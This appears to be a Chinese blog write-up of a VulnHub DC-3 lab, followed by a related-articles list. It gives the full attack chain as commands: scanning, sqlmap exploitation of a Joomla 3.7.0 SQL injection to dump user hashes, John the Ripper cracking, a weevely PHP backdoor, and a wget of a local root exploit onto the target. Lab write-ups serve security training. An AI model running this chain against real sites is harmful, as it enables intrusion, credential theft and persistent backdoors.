准备工作

在vulnhub官网下载DC:1靶机www.vulnhub.com/entry/dc-3,312/

导入到vmware

导入的时候遇到一个问题

解决方法:

点 “虚拟机”->“设置”->选择 “磁盘/光驱IDE设备" ->点 ”高级“,

将要 启动设备 设置到 IDE 0:0 上就可以了

打开kali准备进行渗透(ip:192.168.200.6)

信息收集

利用nmap进行ip端口探测

nmap -sS 192.168.200.6/24  

探测到ip为192.168.200.14的靶机,开放了80端口,这里吸取到dc2的教训,再用nmap对所有端口进行探测

nmap -sV -p- 192.168.200.14 

已经没有别的端口开放了,那就进入网站看看

首页给到的信息是只有一个flag和一个入口,让我们直接获取root权限,简单粗暴

网站用的是Joomla框架,可以使用joomscan工具获取其框架的详细版本信息

再用dirsearch对目录进行扫描看看有没有别的有用信息

dirsearch -u http://192.168.200.14:80

除了个后台登陆页面好像没有别的有用的信息了http://192.168.200.14/administrator/index.php

Joomla

使用joomscan进行扫描,在kali直接下载

apt install joomscan


joomscan -u 192.168.200.14

 

看到版本是joomla3.7.0

百度到joomla存在sql注入漏洞CVE-2017-8917

但在msf不能直接利用这个漏洞

只能在searchploit中查找关于这个漏洞的利用方法

searchsploit joomla 3.7

可以打开txt文件查看具体的利用方法说明(绝对路径为/usr/share/exploitdb/exploits/php/webapps/42033.txt)

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt 

直接告诉我们使用sqlmap,payload都写好给你了

漏洞利用——sql注入

使用sqlmap用刚刚得到的payload直接跑

sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

得到5个数据库,接下来查看joomladb数据库中的表

sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

拿到表名#__users,接下来查看列名

sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

拿到列名后就可以看数据了

sqlmap -u "http://192.168.200.14/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password,username --dump -p list[fullordering]

得到加密的密码$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

去md5在线解密网站也解不出,但应该也是某种hash加密,只能祭出强大的John the Ripper(密码破解工具)

保存一下密码,直接用john爆破

得到密码snoopy

去之前扫到的后台登陆界面登陆后台

漏洞利用——文件上传

在后台管理页面中找到了文件上传的地方,准备测试一下有没有文件上传的漏洞

使用weevely(linux中的蚁剑)工具生成后门木马

weevely generate test test.php

这样就生成了后门木马

但这里的文件上传的地方好像不行,只能在里面创建一个文件,然后将代码复制进去

然后用weevely连接shell(这里的url是test.php的路径)

weevely http://192.168.200.14/templates/beez3/test.php test

连接成功,现在已经拿到一个webshell,但只有www-data权限,开始提权

权限提升

查看内核版本

uname -a

 

使用linux 4.4.0-21-generic #37-Ubuntu,在网上查找是ubuntu16.04

在searchploit寻找关于ubuntu16.04的权限提升的漏洞

searchsploit ubuntu 16.04 linux

打开文件查看漏洞具体利用方法

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

下载exp到dc3的本地

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

解压 unzip 39772.zip,再解压tar -xvf exploit.tar

接下来就执行刚刚漏洞利用文件演示的代码

./compile.sh
./doubleput

但是我不知道什么情况执行了之后报错,看了看别人的也有一位和我一样卡住不知道什么原因

就差最后一步就可以拿到flag了。。。以后有时间在看看是怎么回事

参考文章

靶机实战-DC-3_滕财然的博客-CSDN博客

Vulnhub之路Ⅵ——DC-3(最后一步卡住) - 知乎 (zhihu.com)

vulnhub-DC:3靶机渗透记录的更多相关文章

  1. vulnhub-DC:2靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-2,311/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...

  2. vulnhub-DC:5靶机渗透记录

    准备工作 在vulnhub官网下载DC:5靶机DC: 5 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  3. vulnhub-DC:6靶机渗透记录

    准备工作 在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  4. vulnhub-DC:1靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-1,292/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...

  5. vulnhub-DC:4靶机渗透记录

    准备工作 在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/ 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:19 ...

  6. vulnhub-DC:7靶机渗透记录

    准备工作 在vulnhub官网下载DC:7靶机DC: 7 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 已经知道了靶 ...

  7. vulnhub-DC:8靶机渗透记录

    准备工作 在vulnhub官网下载DC:8靶机DC: 8 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  8. vulnhub-XXE靶机渗透记录

    准备工作 在vulnhub官网下载xxe靶机 导入虚拟机 开始进行渗透测试 信息收集 首先打开kali,设置成NAT模式 查看本机ip地址 利用端口扫描工具nmap进行探测扫描 nmap -sS 19 ...

  9. DC 1-3 靶机渗透

    DC-1靶机 端口加内网主机探测,发现192.168.114.146这台主机,并且开放了有22,80,111以及48683这几个端口. 发现是Drupal框架. 进行目录的扫描: 发现admin被禁止 ...

随机推荐

  1. NEXTCLOUD 常见错误

    HTTP请求头"Strict-Transport-Security"没有配置为至少"15552000"秒出于增强安全性考虑推荐按照安全提示中的说明启用HSTS ...

  2. 【Azure 机器人】微软Azure Bot 编辑器系列(2) : 机器人/用户提问回答模式,机器人从API获取响应并组织答案 (The Bot Framework Composer tutorials)

    欢迎来到微软机器人编辑器使用教程,从这里开始,创建一个简单的机器人. 在该系列文章中,每一篇都将通过添加更多的功能来构建机器人.当完成教程中的全部内容后,你将成功的创建一个天气机器人(Weather ...

  3. Waymo object detect 2D解决方案论文拓展

    FixMatch 半监督中的基础论文,自监督和模型一致性的代表作. Consistency regularization: 无监督学习的方式,数据\(A\)和经过数据增强的\(A\)计做\(A'\) ...

  4. Ubuntu安装部署Kafka

    Ubuntu安装部署Kafka 环境: Ubuntu 18.04.4 LTS ,JDK1.8,kafka_2.12-2.3.1 确保已经安装了JDK,JDK安装过程不再赘述.可参考文章xxxx 一.下 ...

  5. 用python+pyqt5语言编写的扫雷小游戏软件

    github源码地址:https://github.com/richenyunqi/Mine-game ,撒娇打滚求star哦~~ღ( ´・ᴗ・` )比心 扫雷主界面模块 整个扫雷界面使用大量的白色方 ...

  6. ceph-csi源码分析(8)-cephfs driver分析

    更多 ceph-csi 其他源码分析,请查看下面这篇博文:kubernetes ceph-csi分析目录导航 ceph-csi源码分析(8)-cephfs driver分析 当ceph-csi组件启动 ...

  7. NUC980 运行 RT-Thread 驱动 SPI 接口 OLED 播放 badapple

    badapple 是什么,上网随便查了下,没看出个究竟,不过有个关于这个挺火的标签或者主题 < 有屏幕的地方就有 badapple >,网上有很多人用很多方式播放 badapple 动画, ...

  8. 11、mysql索引详解

    1.索引介绍: 2.建立索引的方法: 注意:索引名称不要相同: (1)在建表的时候,可以增加主键索引的语句如下: 1)例一: create table student1 ( id int(4) not ...

  9. 【译】Go:程序如何恢复?

    原文:https://medium.com/a-journey-with-go/go-how-does-a-program-recover-fbbbf27cc31e ​ 当程序不能正确处理错误时, 会 ...

  10. 如何在微信小程序的模板渲染中使用JS?

    在微信小程序中使用模板渲染时,可能需要用JS对其进行处理. <view class="price text-red text-lg"> <!-- 价格保留两位小数 ...